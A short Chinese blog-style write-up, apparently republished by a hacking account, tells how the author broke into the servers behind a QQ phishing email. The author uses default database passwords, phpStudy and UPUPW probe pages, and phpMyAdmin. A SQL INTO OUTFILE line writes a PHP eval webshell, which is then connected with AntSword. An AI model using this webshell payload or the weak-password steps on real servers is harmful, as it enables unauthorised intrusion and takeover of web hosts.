0x00 前言
打开邮箱,发现垃圾箱里躺着一封垃圾邮件
一看就是钓鱼邮件,话不多说,搞他。
没什么技术含量,看看就好。
0x01 渗透过程
第一部分
直接打开链接
除了登陆可以点击,其他超链接都是假的,也太不敬业了。
然后发现地址栏域名和垃圾邮箱里面的给的链接的域名不一样, 是跳转过去的,遂访问初始的域名。
打开一看,phpStudy 探针 2014
页面。
phpstudy 探针 可以测试 数据库连接,试试看弱口令,phpstudy
数据库默认账号密码root
测试成功。
然后尝试登陆phpmyadmin
直接访问url /phpMyAdmin/
,使用测试成功的弱口令登陆。
数据库里面没什么东西,因为在探针页面
知道了物理路径,所有直接写一句话木马,连接之。
select '<?php @eval($_POST[pass]);?>' into outfile 'D:/phpstudy/WWW/test.php';
这个服务器里面啥都没有,只有几个用来跳转连接的php文件, 就回到开头,继续搞qq钓鱼网站的。
第二部分
QQ钓鱼站的后台,找了一圈没找到。
访问一个不存在的文件,提示页面如下图
发现是用UPUPW
搭建的,猜测会不会也有phpmyadmin
尝试访问url /phpMyAdmin/
,返回 404
又尝试访问url /pmd/
,成了
尝试弱口令成功登陆
准备写入一句话木马,不知道物理路径。 使用语句
select @@basedir
然后尝试在upupw
默认网站路径下写入木马
提示:(Errcode: 2 "No such file or directory")
写入失败,文件夹不存在
然后又尝试了其他路径名,均以失败告终
一筹莫展之际,
想到upupw
会不会也有探针页面,会不会没删?
百度之,upupw
默认的探针页面是u.php
,
尝试访问
得到网站物理路径,然后又是愉快的上蚁剑马连接了。
代码语言:javascript复制作者:dylan作者博客:dylan‘s blog
本文由公众号HACK学习排版编辑整理